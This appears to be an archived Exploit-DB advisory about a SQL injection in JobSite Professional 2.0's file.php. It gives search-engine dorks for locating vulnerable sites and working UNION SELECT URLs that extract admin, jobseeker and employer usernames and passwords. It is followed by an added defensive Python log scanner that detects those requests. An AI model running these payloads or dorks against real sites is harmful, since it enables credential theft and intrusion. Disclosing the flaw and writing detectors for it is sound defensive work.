JobSite Professional 2.0 - 'file.php' SQL Injection

EDB-ID: 4576
Author: ZynbER
Type: webapps
Platform: PHP
Date: 2007-10-28


#########################################################################
JobSite Professional v2.0    Remote SQL Injection Vulnerability
#########################################################################


## AUTHOR : ZynbER
## HOME : NoWhere


## Script WebSite:
http://www.jobsiteprofessional.com

## Dork english version : inurl:index.php?page=en_jobseekers
## Dork french version  : inurl:index.php?page=fr_Candidats


## EXPLOITS :

The id parameter of file.php (file.php?id=) is vulnerable to SQL injection:



http://website.com/file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+websiteadmin_admin_users/*

http://website.com/file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+websiteadmin_ext_jobseekers/*

http://website.com/file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+websiteadmin_ext_employers/*



## Note
No registration is needed!!
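
A defender-side check for the requests shown above, as an added example that is not part of the original advisory: it scans web-server access logs for file.php requests whose id value is not a plain integer and marks those carrying UNION SELECT. The log lines are constructed, and the rule that legitimate id values are plain integers is an assumption, since the advisory does not show the source of file.php.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format); addresses are documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [28/Oct/2007:10:00:01 +0000] "GET /file.php?id=42 HTTP/1.1" 200 5120',
    '192.0.2.66 - - [28/Oct/2007:10:00:05 +0000] "GET /file.php?id=-1+UNION+SELECT+1,2,'
    'PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+websiteadmin_admin_users/*'
    ' HTTP/1.1" 200 812',
    '192.0.2.66 - - [28/Oct/2007:10:00:09 +0000] "GET /file.php?id=-1%20uNiOn%2f**%2fSeLeCt%201 HTTP/1.1" 200 640',
    '198.51.100.7 - - [28/Oct/2007:10:01:00 +0000] "GET /file.php?id=7%27 HTTP/1.1" 500 120',
    '192.0.2.11 - - [28/Oct/2007:10:02:00 +0000] "GET /index.php?page=en_jobseekers HTTP/1.1" 200 9000',
]

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SQL_COMMENT = re.compile(r'/\*.*?\*/|--[^\n]*|#[^\n]*', re.S)  # comments used to split keywords
UNION_SELECT = re.compile(r'\bunion[\s(]+(?:all[\s(]+|distinct[\s(]+)?select\b', re.I)

def classify_id(value):
    """Return 'ok', 'suspicious' (not an integer) or 'sqli' (UNION SELECT present)."""
    if re.fullmatch(r'\d+', value):  # assumption: legitimate ids are plain integers
        return 'ok'
    stripped = SQL_COMMENT.sub(' ', value)  # uNiOn/**/SeLeCt -> uNiOn SeLeCt
    return 'sqli' if UNION_SELECT.search(stripped) else 'suspicious'

def scan(lines, script='/file.php', param='id'):
    """Return (client_ip, verdict, decoded_value) for each non-'ok' request to script."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith(script):  # the advisory writes both File.php and file.php
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            verdict = classify_id(value)  # parse_qs has already decoded '+' and %xx
            if verdict != 'ok':
                findings.append((client, verdict, value))
    return findings

if __name__ == '__main__':
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same integer-only rule, enforced in the application before the value reaches the query (or replaced by a parameterized query), removes the injection point rather than just reporting it.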



## GREETZ  :  MEKNES - SIDIBABA - MARROK - SKIZO - BouKa-BouKa


# milw0rm.com [2007-10-28]